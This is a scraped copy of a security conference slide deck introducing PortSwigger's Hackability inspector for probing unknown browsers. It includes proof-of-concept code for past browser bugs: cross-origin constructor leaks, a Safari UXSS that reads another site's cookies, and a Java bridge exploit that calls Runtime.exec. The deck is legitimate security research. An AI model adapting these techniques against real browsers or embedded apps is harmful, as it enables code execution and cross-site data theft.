Scribd
Upload
44 views42 pages

Exploitingunknownbrowsers

Uploaded by

rkreddy_pandu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
44 views42 pages

Exploitingunknownbrowsers

Uploaded by

rkreddy_pandu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 42

Exploiting unknown

browsers and objects


with the Hackability inspector

!1
About me

U+6158

• I'm a researcher at PortSwigger

• I ❤ hacking JavaScript 1337inalert(1)

• @garethheyes

!2
Hackability

• Created to test capabilities of unknown web rendering


engines

• JavaScript and HTML tests

• Is SOP enabled? Is JavaScript supported? CSS imports


allowed? etc

!3
!4
Hackability

• Finds interesting objects

• How can we inspect those objects?

• We need a new tool!

!5
Life before dev tools
!6
Life before dev tools

• All we had was view source

• Imagine debugging with just view source

• No console! alert(variable);

!7
Missing dev tools

• What if the browser doesn't have dev tools?

• How do you know what objects are available?

• How can you find the interesting stuff?

!8
New tool

James:We need an
inspector for
Hackability!

Me:Yeah, like dev tools


but for security!

!9
!10
Introducing inspector

• Hackability inspector is your missing dev tools for security

• Finds and shows interesting objects first

• Automatically runs security tests on each property

!11
!12
Inspecting HTML

• Inspector supports HTML

• If input begins with < Inspector automatically writes


HTML

• You can inspect elements or even cross domain objects

!13
Filter objects

• RegEx filter property name

• Filter by type of object e.g. window

• Filter by interesting property

!14
!15
Detecting JS windows
• Detecting window
function isWindow(obj) {
try {
return!!(obj && obj.window === obj);
} catch(e){
return false;
}
}

• Detecting cross domain window


function isCrossDomainWindow(obj) {
var read;
if(!isWindow(obj)) {
return false;
}
try {
read = obj.location.toString();
return false
} catch(e){
return true;
}
}
!16
!17
Detecting Function/Object
• Detecting Function constructor
function isFunctionConstructor(obj) {
try {
return obj.constructor === obj;
} catch(e){
return false;
}
}

• Detecting Object constructor


function isObjectConstructor(obj) {
try {
return!!(obj&&obj.__proto__&&obj.__proto__.__proto__&&
obj===obj.__proto__.__proto__.constructor);
} catch(e){
return false;
}
}

!18
Demo

!19
!20
Security bugs
• Safari allowed setting of host cross domain
iframe.contentWindow.location.host='portswigger.net';

• Safari allowed overwriting of top/parent with another


function
<iframe src="http://externaldomain"
onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>

External domain:
<script>
parent(1);
top(2);
</script>

!21
Security bugs
• Leaking constructor enabled access to cross domain
objects on IE
iframe.contentWindow.closed.constructor.
constructor('alert(document.domain)')();

• Opera leaking cross domain objects from location


iframe.contentWindow.location.constructor.
prototype.__defineGetter__
.constructor('[].constructor.prototype.join=function()
{alert("PWND:"+document.body.innerHTML)}')();

• Firefox leaking cross domain location


var win = window.open('https://twitter.com/','newWin');
alert(win.location)

!22
Security bugs
• Safari about:blank UXSS
<script type="text/javascript">
function breakSop() {
var doc = window.frames.loader.document;
var html = '';
html += '<p>test</p><iframe src="http://www.amazon.co.uk/"
id="iframe" name="iframe"
onload="alert(window.frames.iframe.document.getElementsByTagName(\'body\')
[0].innerHTML);alert(window.frames.iframe.document.cookie);"></iframe>';
doc.body.innerHTML = html;
}
</script>
<iframe src="about:blank" name="loader" id="loader" onload="breakSop()">
</iframe>

!23
Security bugs

• All these bugs would be easy to find with inspector

• I've created automated tests to find bugs like these

• Manual analysis is easier using the inspector

!24
!25
Security tests
• Setting variables cross domain
if(isCrossDomainWindow(obj)) {
try {
obj.setPropertyTest = 'test';
if(obj.setPropertyTest === 'test') {
output += '<div class="error">Can set properties on x-domain window</div>';
}
} catch(e){}}

•tryCheck
{
for data leaking in exceptions
test = obj.readPropertyTest;
} catch(e){
try {
e.toString().replace(/https?:\/\/[^\s'"]+/gi,function(domain){
domain = domain.replace(/[.]+$/,'');
domain = domain.replace(/\s+$/,'');
domain = domain.replace(/^\s+/,'');
if(domain !== location.origin) {
output += '<div class="error">Leaking x-domain origin
from iframe: '+escapeHTML(domain)+'</div>';
}
});
} catch(e){}
!26
Security tests
• How can you tell if you can call a cross domain function?

• Call the Function constructor to check the domain


obj.constructor.constructor('return document.domain')()

x-domain.com

function Function() { [native code] }

function Object() { [native code] }

[object Object]

!27
Security tests
• tryFunction
{
constructor leak checks
if(obj.constructor.constructor('return document.domain')()
!== document.domain) {
if(window.console) {
console.log('X-domain constructor found!');
}
output += '<div class="error">X-domain constructor found!</div>';
}
} catch(e){}

• Function constructor leak checks continued


try {
if(obj.constructor.prototype.__defineGetter__.constructor('return
document.domain')() !== document.domain) {
if(window.console) {
console.log('X-domain constructor found!');
}
output += '<div class="error">X-domain constructor found!</div>';
}
} catch(e){}

!28
!29
Detecting Java bridges

• Detect if object is a Java bridge

• Use java.net.socket new instance to test if Java bridge is


vulnerable

• Generate exploit using getClass

!30
Detecting Java bridges
• Detect bridge
function isJavaBridge(obj) {
try {
return!!(obj && obj.getClass && obj.hashCode);
} catch(e){
return false;
}
}

• Check if bridge is vulnerable


try {
obj.getClass().forName("java.net.Socket").newInstance();
} catch(e){}
}

!31
Exploiting Java bridges
• Exploit using getClass and Runtime
var field=javaBridgeObject.getClass().forName('java.lang.Runtime')
.getDeclaredField('currentRuntime');
field.setAccessible(true);
var runtime = field.get(123);
if(/mac/i.test(navigator.platform)) {
runtime.exec('open -a Calculator');
} else if(/linux/i.test(navigator.platform)) {
runtime.exec('/bin/bash -c gnome-calculator');
} else if(/win/i.test(navigator.platform)) {
runtime.exec('calc');
}

• Exploited JxBrowser with this technique

• TeamDev (JxBrowser developers) patched bug with


annotations

!32
Exploiting Java bridges

• Exploited JxBrowser again using the inspector

• References to other objects weren't checked even when


annotations prevent access to public fields

• E.g.
bridge.getTestObject().field.getClass();

!33
!34
Demo

!35
Advanced inspection

• Execute JavaScript on every property


?input=window&regex=^.
{1,3}$&js=alert(prop)&type=function

• Inside the js filter "obj" refers to the current object and


"prop" refers to the property

• E.g. calling every function on a object obj[prop]()

!36
Advanced inspection

• Query string parameters supported for every inspection


feature

• Blind parameter saves inspection results


?input=window&blind=1

• Results can be viewed from display.php

!37
Use cases

• Find browser issues using Inspector as a console


(multiline mode)

• Embed within a sandbox environment to explore


sandboxed code

• Use blind mode to inspect browsers you can't interact


with

!38
Shortcuts and commands
• Up and down arrows cycle through history like dev tools, Up/
Down + Alt works in multiline mode

• Multiline mode is initiated when blocks are entered such as if()


{ or new lines or ; is entered

• Return eval's and inspects

• Ctrl+Return just executes

• Shift+Return evals and returns the output

• Ctrl+Backspace clears, Ctrl + Shift + backspace clears history

!39
Conclusion

• Don't stop testing because there's no dev tools

• Use inspector to gather information about your


environment

• Exploit the environment by using interesting functions

!40
Life before inspector
!41
Thanks. Questions?
Demo:
portswigger-labs.net/hackability/inspector

Github:
github.com/portswigger/hackability

Twitter:
twitter.com/garethheyes

!42

You might also like